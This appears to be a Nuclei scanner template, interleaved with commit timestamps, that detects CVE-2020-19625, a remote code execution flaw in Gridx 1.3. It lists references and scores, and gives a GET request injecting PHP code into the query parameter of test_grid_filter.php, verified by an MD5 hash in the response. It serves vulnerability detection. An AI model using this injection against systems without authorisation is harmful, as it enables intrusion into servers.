2021-05-26 11:09:57 +00:00
id : CVE-2020-19625
2022-04-22 10:38:41 +00:00
2021-04-15 13:16:11 +00:00
info :
2022-04-29 19:58:07 +00:00
name : Gridx 1.3 - Remote Code Execution
2021-04-15 13:16:11 +00:00
author : geeknik
2021-09-10 11:26:40 +00:00
severity : critical
2022-04-29 19:58:07 +00:00
description : |
Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest security patch or upgrade to a non-vulnerable version of Gridx.
2022-04-22 10:38:41 +00:00
reference :
2022-11-02 13:27:28 +00:00
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
2022-04-22 10:38:41 +00:00
- https://github.com/oria/gridx/issues/433
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-19625
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-19625
2023-07-11 19:49:27 +00:00
epss-score : 0.88684
2023-08-31 11:46:18 +00:00
epss-percentile : 0.98276
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : gridx_project
product : gridx
tags : cve,cve2020,gridx,rce
2021-04-15 13:16:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-15 13:16:11 +00:00
- method : GET
path :
2022-11-02 13:27:28 +00:00
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"
2021-04-15 13:16:11 +00:00
matchers-condition : and
matchers :
2022-11-02 13:27:28 +00:00
- type : word
part : body
words :
- "6ca86c2c17047c14437f55c42c801c10"
2021-04-15 13:16:11 +00:00
- type : status
status :
- 200